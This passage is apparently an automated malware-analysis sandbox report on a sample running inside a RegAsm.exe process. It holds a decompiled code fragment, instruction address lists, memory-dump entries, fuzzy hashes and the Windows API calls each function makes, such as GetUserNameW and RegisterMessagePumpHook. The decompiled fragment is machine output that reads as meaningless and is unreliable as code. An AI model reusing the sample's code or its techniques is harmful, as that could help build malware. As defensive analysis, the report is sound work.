				 *((intOrPtr*)(_t396 + 0x28)) =  *((intOrPtr*)(_t396 + 0x28)) + (0x0000000b |  *_t469) + 1;
				_pop(_t424);
				_t397 = _t396 | 0x00000064;
				 *_t397 =  *_t397 + _t397;
				 *_t397 =  *_t397 + _t397;
				 *_t397 =  *_t397 + _t397;
				_t398 = _t395;
				_t445[0xa] = _t445[0xa] + _t398;
				 *_t398 =  *_t398 + _t398;
				_t399 = _t397;
				_t473 = _t398;
				 *((intOrPtr*)(_t399 + 0x680cc528)) =  *((intOrPtr*)(_t399 + 0x680cc528)) + _t436;
				 *_t473 =  *_t473 + _t424;
				 *_t399 =  *_t399 & _t399;
				 *_t399 =  *_t399 + _t399;
				 *((intOrPtr*)(_t473 - 0x6cf1dae8)) =  *((intOrPtr*)(_t473 - 0x6cf1dae8)) + _t399;
				 *_t436 =  *_t436 + _t436;
				 *_t399 =  *_t399 + _t399;
				 *_t399 =  *_t399 + _t399;
				 *_t399 =  *_t399 + 0xffffffc3;
				asm("adc al, 0x3c");
				_t400 = _t399 + 0x69;
				 *_t473 =  *_t473 + _t424;
				 *_t400 =  *_t400 & _t400;
				 *_t400 =  *_t400 + _t400;
				 *((intOrPtr*)(_t473 - 0x6cf1dae8)) =  *((intOrPtr*)(_t473 - 0x6cf1dae8)) + _t400;
				 *_t445 =  *_t445 + 0x22;
				return _t400;
			}

0x00b8f41e
0x00b8f423
0x00b8f429
0x00b8f42a
0x00b8f42b
0x00b8f42d
0x00b8f433
0x00b8f437
0x00b8f439
0x00b8f43b
0x00b8f43d
0x00b8f43f
0x00b8f445
0x00b8f44b
0x00b8f44d
0x00b8f44e
0x00b8f44f
0x00b8f451
0x00b8f453
0x00b8f454
0x00b8f455
0x00b8f457
0x00b8f459
0x00b8f45a
0x00b8f45b
0x00b8f45d
0x00b8f460
0x00b8f465
0x00b8f466
0x00b8f467
0x00b8f469
0x00b8f470
0x00b8f471
0x00b8f473
0x00b8f475
0x00b8f477
0x00b8f479
0x00b8f47b
0x00b8f481
0x00b8f483
0x00b8f489
0x00b8f48a
0x00b8f48f
0x00b8f490
0x00b8f491
0x00b8f493
0x00b8f496
0x00b8f497
0x00b8f499
0x00b8f49b
0x00b8f49e
0x00b8f49f
0x00b8f4a5
0x00b8f4a7
0x00b8f4a9
0x00b8f4aa
0x00b8f4ab
0x00b8f4b3
0x00b8f4b6
0x00b8f4bd
0x00b8f4bf
0x00b8f4cb
0x00b8f4cc
0x00b8f4cd
0x00b8f4cf
0x00b8f4d6
0x00b8f4ef
0x00b8f4f7
0x00b8f4fb
0x00b8f4fd
0x00b8f4ff
0x00b8f501
0x00b8f507
0x00b8f513
0x00b8f519
0x00b8f51f
0x00b8f525
0x00b8f52b
0x00b8f531
0x00b8f533
0x00b8f535
0x00b8f538
0x00b8f539
0x00b8f53b
0x00b8f53d
0x00b8f543
0x00b8f545
0x00b8f547
0x00b8f54b
0x00b8f54d
0x00b8f550
0x00b8f556
0x00b8f557
0x00b8f55b
0x00b8f55c
0x00b8f560
0x00b8f563
0x00b8f565
0x00b8f56d
0x00b8f56f
0x00b8f571
0x00b8f574
0x00b8f57a
0x00b8f57c
0x00b8f57e
0x00b8f580
0x00b8f580
0x00b8f586
0x00b8f587
0x00b8f589
0x00b8f590
0x00b8f596
0x00b8f596
0x00b8f59c
0x00b8f59d
0x00b8f5a2
0x00b8f5a5
0x00b8f5a7
0x00b8f5ad
0x00b8f5b0
0x00b8f5b2
0x00b8f5b2
0x00b8f5b4
0x00b8f5b6
0x00b8f5b8
0x00b8f5b8
0x00b8f5b9
0x00b8f5bf
0x00b8f5c1
0x00b8f5c3
0x00b8f5c5
0x00b8f5cb
0x00b8f5cd
0x00b8f5cf
0x00b8f5d1
0x00b8f5d3
0x00b8f5d9
0x00b8f5df
0x00b8f5e1
0x00b8f5e7
0x00b8f5e9
0x00b8f5eb
0x00b8f5ed
0x00b8f5ef
0x00b8f5f5
0x00b8f5f7
0x00b8f5f9
0x00b8f5fb
0x00b8f5fd
0x00b8f603
0x00b8f605
0x00b8f607
0x00b8f609
0x00b8f60b
0x00b8f611
0x00b8f613
0x00b8f619
0x00b8f61f
0x00b8f621
0x00b8f623
0x00b8f625
0x00b8f627
0x00b8f62d
0x00b8f62f
0x00b8f631
0x00b8f633
0x00b8f635
0x00b8f63b
0x00b8f63d
0x00b8f640
0x00b8f642
0x00b8f644
0x00b8f644
0x00b8f645
0x00b8f647
0x00b8f64d
0x00b8f64e
0x00b8f650
0x00b8f652
0x00b8f652
0x00b8f653
0x00b8f656
0x00b8f658
0x00b8f65f
0x00b8f665
0x00b8f669
0x00b8f66b
0x00b8f66d
0x00b8f673
0x00b8f676
0x00b8f679
0x00b8f67b
0x00b8f681
0x00b8f684
0x00b8f685
0x00b8f687
0x00b8f689
0x00b8f68f
0x00b8f692
0x00b8f693
0x00b8f695
0x00b8f697
0x00b8f69d
0x00b8f6a0
0x00b8f6a1
0x00b8f6a3
0x00b8f6a5
0x00b8f6ab
0x00b8f6ae
0x00b8f6b0
0x00b8f6b2
0x00b8f6b4
0x00b8f6b4
0x00b8f6b5
0x00b8f6bb
0x00b8f6bd
0x00b8f6bf
0x00b8f6c1
0x00b8f6c7
0x00b8f6cd
0x00b8f6cf
0x00b8f6d5
0x00b8f6d7
0x00b8f6dd
0x00b8f6e3
0x00b8f6e5
0x00b8f6e7
0x00b8f6e9
0x00b8f6eb
0x00b8f6f1
0x00b8f6f3
0x00b8f6f7
0x00b8f6f9
0x00b8f6ff
0x00b8f701
0x00b8f703
0x00b8f705
0x00b8f707
0x00b8f70d
0x00b8f70f
0x00b8f717
0x00b8f71c
0x00b8f71d
0x00b8f720
0x00b8f722
0x00b8f725
0x00b8f728
0x00b8f72a
0x00b8f72c
0x00b8f731
0x00b8f737
0x00b8f739
0x00b8f740
0x00b8f741
0x00b8f744
0x00b8f74b
0x00b8f74d
0x00b8f753
0x00b8f759
0x00b8f75b
0x00b8f75c
0x00b8f75d
0x00b8f763
0x00b8f765
0x00b8f768
0x00b8f76a
0x00b8f76a
0x00b8f76b
0x00b8f771
0x00b8f777
0x00b8f77d
0x00b8f77f
0x00b8f781
0x00b8f783
0x00b8f785
0x00b8f78b
0x00b8f791
0x00b8f793
0x00b8f799
0x00b8f79f
0x00b8f7a1
0x00b8f7a7
0x00b8f7a9
0x00b8f7ac
0x00b8f7ae
0x00b8f7b0
0x00b8f7b3
0x00b8f7b6
0x00b8f7bd
0x00b8f7c3
0x00b8f7c8
0x00b8f7ca
0x00b8f7cc
0x00b8f7cd
0x00b8f7cf
0x00b8f7d2
0x00b8f7d4
0x00b8f7d5
0x00b8f7d7
0x00b8f7d9
0x00b8f7df
0x00b8f7e1
0x00b8f7e7
0x00b8f7ed
0x00b8f7ef
0x00b8f7f1
0x00b8f7f3
0x00b8f7f5
0x00b8f7fb
0x00b8f7fd
0x00b8f800
0x00b8f802
0x00b8f804
0x00b8f807
0x00b8f80c
0x00b8f80d
0x00b8f80f
0x00b8f811
0x00b8f817
0x00b8f819
0x00b8f81f
0x00b8f827
0x00b8f829
0x00b8f82b
0x00b8f82d
0x00b8f833
0x00b8f835
0x00b8f83c
0x00b8f83f
0x00b8f844
0x00b8f845
0x00b8f847
0x00b8f849
0x00b8f84f
0x00b8f855
0x00b8f857
0x00b8f85d
0x00b8f85f
0x00b8f861
0x00b8f863
0x00b8f865
0x00b8f86b
0x00b8f86d
0x00b8f86f
0x00b8f871
0x00b8f873
0x00b8f879
0x00b8f87b
0x00b8f881
0x00b8f887
0x00b8f889
0x00b8f88c
0x00b8f88e
0x00b8f890
0x00b8f891
0x00b8f897
0x00b8f89f
0x00b8f8a6
0x00b8f8a7
0x00b8f8a9
0x00b8f8ab
0x00b8f8b1
0x00b8f8b3
0x00b8f8b5
0x00b8f8b7
0x00b8f8b9
0x00b8f8bf
0x00b8f8c1
0x00b8f8c3
0x00b8f8c5
0x00b8f8c7
0x00b8f8cd
0x00b8f8ce
0x00b8f8cf
0x00b8f8d2
0x00b8f8d4
0x00b8f8d6
0x00b8f8d6
0x00b8f8d7
0x00b8f8da
0x00b8f8db
0x00b8f8de
0x00b8f8e0
0x00b8f8e2
0x00b8f8e5
0x00b8f8e9
0x00b8f8ec
0x00b8f8ed
0x00b8f8f0
0x00b8f8f2
0x00b8f8f3
0x00b8f8f6
0x00b8f8fd
0x00b8f8ff
0x00b8f905
0x00b8f907
0x00b8f90e
0x00b8f90e
0x00b8f90f
0x00b8f90f
0x00b8f915
0x00b8f91b
0x00b8f921
0x00b8f924
0x00b8f929
0x00b8f932
0x00b8f935
0x00b8f937
0x00b8f93d
0x00b8f93d
0x00b8f941
0x00b8f943
0x00b8f945
0x00b8f94b
0x00b8f94f
0x00b8f951
0x00b8f953
0x00b8f959
0x00b8f95c
0x00b8f95d
0x00b8f95f
0x00b8f961
0x00b8f967
0x00b8f96a
0x00b8f96b
0x00b8f96d
0x00b8f96f
0x00b8f975
0x00b8f978
0x00b8f979
0x00b8f97b
0x00b8f97d
0x00b8f983
0x00b8f986
0x00b8f987
0x00b8f989
0x00b8f98b
0x00b8f991
0x00b8f994
0x00b8f995
0x00b8f997
0x00b8f999
0x00b8f99f
0x00b8f9a2
0x00b8f9a3
0x00b8f9a5
0x00b8f9a7
0x00b8f9ad
0x00b8f9b0
0x00b8f9b2
0x00b8f9b4
0x00b8f9b6
0x00b8f9b9
0x00b8f9bb
0x00b8f9be
0x00b8f9c0
0x00b8f9c2
0x00b8f9c4
0x00b8f9c4
0x00b8f9c5
0x00b8f9c7
0x00b8f9ca
0x00b8f9cb
0x00b8f9cd
0x00b8f9cf
0x00b8f9d1
0x00b8f9d7
0x00b8f9da
0x00b8f9e0
0x00b8f9e0
0x00b8f9e2
0x00b8f9e3
0x00b8f9e5
0x00b8f9e8
0x00b8f9ea
0x00b8f9ec
0x00b8f9ee
0x00b8f9f1
0x00b8f9f3
0x00b8f9f6
0x00b8f9f8
0x00b8f9fa
0x00b8f9fc
0x00b8f9ff
0x00b8fa03
0x00b8fa0a
0x00b8fa0d
0x00b8fa13
0x00b8fa15
0x00b8fa17
0x00b8fa1d
0x00b8fa20
0x00b8fa22
0x00b8fa24
0x00b8fa26
0x00b8fa29
0x00b8fa2b
0x00b8fa2e
0x00b8fa2f
0x00b8fa31
0x00b8fa33
0x00b8fa39
0x00b8fa3d
0x00b8fa3f
0x00b8fa41
0x00b8fa47
0x00b8fa4c
0x00b8fa4e
0x00b8fa50
0x00b8fa53
0x00b8fa55
0x00b8fa58
0x00b8fa59
0x00b8fa5a
0x00b8fa5c
0x00b8fa5e
0x00b8fa5f
0x00b8fa65
0x00b8fa68
0x00b8fa6a
0x00b8fa6d
0x00b8fa75
0x00b8fa76
0x00b8fa78
0x00b8fa7b
0x00b8fa81
0x00b8fa84
0x00b8fa86
0x00b8fa89
0x00b8fa8b
0x00b8fa8e
0x00b8fa8f
0x00b8fa91
0x00b8fa92
0x00b8fa94
0x00b8fa96
0x00b8fa97
0x00b8fa99
0x00b8fa9a
0x00b8fa9d
0x00b8faa0
0x00b8faa2
0x00b8faa4
0x00b8faa5
0x00b8faa7
0x00b8faac
0x00b8faad
0x00b8faae
0x00b8fab0
0x00b8fab3
0x00b8fab9
0x00b8fabc
0x00b8fabe
0x00b8fac0
0x00b8fac1
0x00b8fac4
0x00b8fac5
0x00b8fac7
0x00b8faca
0x00b8facc
0x00b8face
0x00b8facf
0x00b8fada
0x00b8fadc
0x00b8fadc
0x00b8fadd
0x00b8fae3
0x00b8fae5
0x00b8fae7
0x00b8fae9
0x00b8faef
0x00b8faf4
0x00b8faf6
0x00b8faf8
0x00b8fafb
0x00b8fafd
0x00b8faff
0x00b8fb01
0x00b8fb03
0x00b8fb05
0x00b8fb0b
0x00b8fb0e

Memory Dump Source

Source File: 00000000.00000002.665133519.0000000000B02000.00000002.00020000.sdmp, Offset: 00B00000, based on PE: true

Associated: 00000000.00000002.665127746.0000000000B00000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.665207502.0000000000B9A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d67624fbee31118bbc8da0af8a55aca48b3140cf2e687a7d8f70e6507a0c694
Instruction ID: d90cd6a150266157f536887ef1100bbb5a7db9c0acc7e8eab7130a00b6b51ef4
Opcode Fuzzy Hash: 8d67624fbee31118bbc8da0af8a55aca48b3140cf2e687a7d8f70e6507a0c694
Instruction Fuzzy Hash: A142DD6158E3D25FD7138B744CB5686BFB0AE1312475E8ADFC0C1CB8E3E258598AC762

Uniqueness

Uniqueness Score: -1.00%

Function 02DE04E1, Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.665625917.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 682351b13dfa88bf27c3145a73082cbe36bb0871e47a294d2374677aea2f6a90
Instruction ID: 62d3b0678994a2b32fb1046e4ee1de3272d11a1dadf1432dea0bbc02a30f4d74
Opcode Fuzzy Hash: 682351b13dfa88bf27c3145a73082cbe36bb0871e47a294d2374677aea2f6a90
Instruction Fuzzy Hash: 1AD10731D20B5A9ACB10EFA5D950A9DF371FF95300F518B9BD40937229EB706AC8CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02DE04F0, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.665625917.0000000002DE0000.00000040.00000001.sdmp, Offset: 02DE0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40949933bbfb09e9b9589585be5e89082c9e1938830b826d443a84b9284c8e7f
Instruction ID: cec5b609d5ba0c9472a4347911c2aab896a4f28eab2071c44eca52c4fc19fbaa
Opcode Fuzzy Hash: 40949933bbfb09e9b9589585be5e89082c9e1938830b826d443a84b9284c8e7f
Instruction Fuzzy Hash: CAD1F831D20B1A9ACB10EFA5D950A9DB371FF95300F518B9BD50937229FB706AC8CB81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 864 Parent PID: 3984 RegAsm.exeCOMMON

Executed Functions

Function 027CE198, Relevance: 1.9, APIs: 1, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.920240049.00000000027C0000.00000040.00000001.sdmp, Offset: 027C0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecc12d764439385c5dc7a3dde16afe1a989df0a46cbf163e70ec0d5de966eb3b
Instruction ID: 253f81571ecea4bc1f9590330cd1c8b8f8effe4d17a66f2f6e3e5568a14eb5e0
Opcode Fuzzy Hash: ecc12d764439385c5dc7a3dde16afe1a989df0a46cbf163e70ec0d5de966eb3b
Instruction Fuzzy Hash: 72F12B34A00219CFDB14DFA5C948B9DBBF2BF88304F25856DE409AB3A5DB74E945CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02700740, Relevance: 1.7, APIs: 1, Instructions: 178libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 027007EF

Memory Dump Source

Source File: 00000002.00000002.920140320.0000000002700000.00000040.00000001.sdmp, Offset: 02700000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dee2bf99cad9a4d2f31c8f209257ea7c834ed97baebef9556829b58a3d80447
Instruction ID: a63e11ef8efa71ba35f92ee5e3e46ec8a2a4b337b6a2f2c726e8bd25382515e8
Opcode Fuzzy Hash: 8dee2bf99cad9a4d2f31c8f209257ea7c834ed97baebef9556829b58a3d80447
Instruction Fuzzy Hash: 8051B034B102059FCB04EBB4D885BAEB7F2BF89314F148969E5059B295EF34DD09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05CD2654, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,00000000), ref: 05CDB62B

Memory Dump Source

Source File: 00000002.00000002.922131642.0000000005CD0000.00000040.00000001.sdmp, Offset: 05CD0000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 565d3fcf5b9cc2bc93c9bebe15e6f2aa8bc34e58abe4ca01f5adcc8f36617b41
Instruction ID: 8d56abaae85b72be8dcce344421f03d923460b2d4cd8431b79332b2eebf7be5d
Opcode Fuzzy Hash: 565d3fcf5b9cc2bc93c9bebe15e6f2aa8bc34e58abe4ca01f5adcc8f36617b41
Instruction Fuzzy Hash: D3513470D002188FDB18CFA9C885BAEFBB1BF48318F15852DE915AB351DB74A845CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 02740A70, Relevance: 19.0, APIs: 12, Instructions: 958windowregistrylibraryCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 02740BCA
GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUserWindow$IconInfoInitializeLongParentThunkWord
String ID:
API String ID: 327440048-0
Opcode ID: 5de49d17d7e2a3760412e25e1e7c3cb4156385ac027bd5108b402924b66dbd97
Instruction ID: 2a4bf73560b2cfe98564fe844ceb9715609a247df099d72ea5e626ff8df7dc94
Opcode Fuzzy Hash: 5de49d17d7e2a3760412e25e1e7c3cb4156385ac027bd5108b402924b66dbd97
Instruction Fuzzy Hash: E4A20474A05228CFCB24AF70D8997ADB7B6BB49305F2045EAD509A7350DF349E82CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740A91, Relevance: 18.6, APIs: 12, Instructions: 631windowregistrylibraryCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 02740BCA
GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUserWindow$IconInfoInitializeLongParentThunkWord
String ID:
API String ID: 327440048-0
Opcode ID: 98ddf9f3ebdad8ec7758baaea460dfdd5418d65ac7b85182de8a413474536594
Instruction ID: b3ebdd92c048c1d341f8a2782ae2b2095922a6c288d4ce3ac0a4c762a039ec57
Opcode Fuzzy Hash: 98ddf9f3ebdad8ec7758baaea460dfdd5418d65ac7b85182de8a413474536594
Instruction Fuzzy Hash: DB52F674A04228CFCB25AF70D8957ADB7B6BB49305F6085EAD509A7340DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740AD8, Relevance: 18.6, APIs: 12, Instructions: 622windowregistrylibraryCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 02740BCA
GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUserWindow$IconInfoInitializeLongParentThunkWord
String ID:
API String ID: 327440048-0
Opcode ID: a0924a9d19f649b4aba68f3483a7d014ebfc9abe7fc5e3c0a9d3071ed621d9e8
Instruction ID: 991ec0680085cb58d4b331867515e666742e47a9c9a7ce0bae515e57aed784ce
Opcode Fuzzy Hash: a0924a9d19f649b4aba68f3483a7d014ebfc9abe7fc5e3c0a9d3071ed621d9e8
Instruction Fuzzy Hash: 7352F674A04228CFCB24AB70D8957ADB7B6BB49305F6085EAD509A7340DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740B16, Relevance: 18.6, APIs: 12, Instructions: 617windowregistrylibraryCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 02740BCA
GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUserWindow$IconInfoInitializeLongParentThunkWord
String ID:
API String ID: 327440048-0
Opcode ID: bde3c4cf8822ab018af3d4bf6fb7492dc86118fd702663e869a3144b832cbbe8
Instruction ID: 3bf4f7cb297fb35f515c43d04c99e048558c81e5abd493550e7d4d7753aaeb5f
Opcode Fuzzy Hash: bde3c4cf8822ab018af3d4bf6fb7492dc86118fd702663e869a3144b832cbbe8
Instruction Fuzzy Hash: 5B52E674A04228CFCB24AF70D8997ADB7B6BB49305F6045EAD509A7340DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740B5D, Relevance: 18.6, APIs: 12, Instructions: 610windowregistrylibraryCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 02740BCA
GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUserWindow$IconInfoInitializeLongParentThunkWord
String ID:
API String ID: 327440048-0
Opcode ID: e735c33086eb34b6d6f1d085116e6d509bef58f575f0db06a5f94fb553731ebb
Instruction ID: 2ceb20b78db3c84123d6eb8226536cb30215743dfa4860506ef8868c485002ad
Opcode Fuzzy Hash: e735c33086eb34b6d6f1d085116e6d509bef58f575f0db06a5f94fb553731ebb
Instruction Fuzzy Hash: 0552E674A04228CFCB24AF70D8997ADB7B6BB49305F6045EAD509A7340DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740BA4, Relevance: 18.6, APIs: 12, Instructions: 603windowregistrylibraryCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 02740BCA
GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUserWindow$IconInfoInitializeLongParentThunkWord
String ID:
API String ID: 327440048-0
Opcode ID: efe6c8f8ee816564bab02968a80da2db67e22a960e170de062b9d06d82c00ab4
Instruction ID: f842a8ea2255d628acc09c1171af0e70e9ab67854eea6b68dd0ed629789572d4
Opcode Fuzzy Hash: efe6c8f8ee816564bab02968a80da2db67e22a960e170de062b9d06d82c00ab4
Instruction Fuzzy Hash: FB52E674A04228CFCB24AF70D8997ADB7B6BB49305F6045EAD509A7340DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740BEB, Relevance: 17.1, APIs: 11, Instructions: 596windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetWindowWord.USER32 ref: 02740C11
GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunkWindowWord
String ID:
API String ID: 4157871092-0
Opcode ID: c1e9eb20cd346183320afd1b995a4778fd9a1a16c9deee3de3502868b007fe4e
Instruction ID: 9a7a454b8fb059f9f87c5bc029b0fc37840a7188ae3fded54b0d917ec612d0a5
Opcode Fuzzy Hash: c1e9eb20cd346183320afd1b995a4778fd9a1a16c9deee3de3502868b007fe4e
Instruction Fuzzy Hash: DA52E674A04228CFCB24AF70D8997ADB7B6BF49305F6085AAD509A7340DF349E86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02740C32, Relevance: 15.6, APIs: 10, Instructions: 589windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: d647a988ce40279b3e2e9ab968a81fed18b042fa2ddf0a05ea2ef410af620d81
Instruction ID: 6ec1477cd5b0341f9424d9417a131faf4300d1c7666c5c93cfc5c3438550f3ec
Opcode Fuzzy Hash: d647a988ce40279b3e2e9ab968a81fed18b042fa2ddf0a05ea2ef410af620d81
Instruction Fuzzy Hash: B152F674A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740C79, Relevance: 15.6, APIs: 10, Instructions: 582windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
RegisterMessagePumpHook.USER32 ref: 02741099
RegisterMessagePumpHook.USER32 ref: 027410C4
RegisterMessagePumpHook.USER32 ref: 027410EE
RegisterMessagePumpHook.USER32 ref: 02741119
LdrInitializeThunk.NTDLL ref: 02741122
KiUserExceptionDispatcher.NTDLL ref: 02741546
KiUserExceptionDispatcher.NTDLL ref: 027417F6

Memory Dump Source

Source File: 00000002.00000002.920197962.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false

Similarity

API ID: HookMessagePumpRegister$DispatcherExceptionUser$IconInfoInitializeParentThunk
String ID:
API String ID: 2099480201-0
Opcode ID: 341a4ab2fbd074f5ffb2a67d8c0645a5a74766e0fbaefc21e206ebce6bc1d284
Instruction ID: b5adf972ee2f0f125be4cd550d656507e2f4aabf64b0e9d734484caa36e0c0d2
Opcode Fuzzy Hash: 341a4ab2fbd074f5ffb2a67d8c0645a5a74766e0fbaefc21e206ebce6bc1d284
Instruction Fuzzy Hash: 1342F674A04228CFCB24AF70D8997ADB7B6BF49305F6045AAD509A7350DF349E82CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02740CC0, Relevance: 15.6, APIs: 10, Instructions: 575windowregistrylibraryCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 02740EFA
GetIconInfoExW.USER32 ref: 02741044
RegisterMessagePumpHook.USER32 ref: 0274106E
